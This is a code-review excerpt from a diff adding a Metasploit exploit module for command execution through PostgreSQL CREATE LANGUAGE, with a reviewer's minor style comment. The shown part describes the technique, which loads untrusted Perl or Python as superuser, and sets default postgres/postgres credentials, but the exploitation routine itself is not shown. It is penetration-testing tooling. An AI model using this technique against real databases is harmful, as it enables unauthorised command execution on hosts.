modules/exploits/multi/postgres/postgres_createlang.rb

```diff
@@ -0,0 +1,258 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/exploit/postgres'
+
+class Metasploit4 < Msf::Exploit::Remote
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::Postgres
+  include Msf::Auxiliary::Report
+
+  # Creates an instance of this module.
+  def initialize(info = {})
+    super(update_info(info,
+          'Name' => 'PostgreSQL CREATE LANGUAGE Execution',
+          'Description' => %q(
+            Some installations of Postgres 8 and 9 are configured to allow loading external scripting languages.
+            Most commonly this is Perl and Python. When enabled, command execution is possible on the host.
+            To execute system commands, loading the "untrusted" version of the language is necessary.
+            This requires a superuser. This is usually postgres. The execution should be platform-agnostic,
+            and has been tested on OS X, Windows, and Linux.
+
+            This module attempts to load Perl or Python to execute system commands. As this dynamically loads
+            a scripting language to execute commands, it is not necessary to drop a file on the filesystem.
+
+            Only Postgres 8 and up are supported.
+          ),
+          'Author' => [
+            'Micheal Cottingham', # author of this module
+            'midnitesnake', # the postgres_payload module that this is based on
+          ],
+          'License' => MSF_LICENSE,
+          'References' => [
+            ['URL', 'http://www.postgresql.org/docs/current/static/sql-createlanguage.html'],
+            ['URL', 'http://www.postgresql.org/docs/current/static/plperl.html'],
+            ['URL', 'http://www.postgresql.org/docs/current/static/plpython.html']
+          ],
+          'Platform' => %w(linux unix win osx),
+          'Payload' => {
+            'PayloadType' => %w(cmd)
+          },
+          'Arch' => [ARCH_CMD],
+          'Targets' => [
+            ['Automatic', {}]
+          ],
+          'DefaultTarget' => 0,
+          'DisclosureDate' => 'Jan 1 2016')
+        )
+
+    register_options([
+      OptString.new('USERNAME', [true, 'The username to the service', 'postgres']),
+      OptString.new('PASSWORD', [true, 'The password to the service', 'postgres'])
+    ], self.class)
```

Comment:
Minor -- remove this last argument.  It is optional and the value your provided is the default value.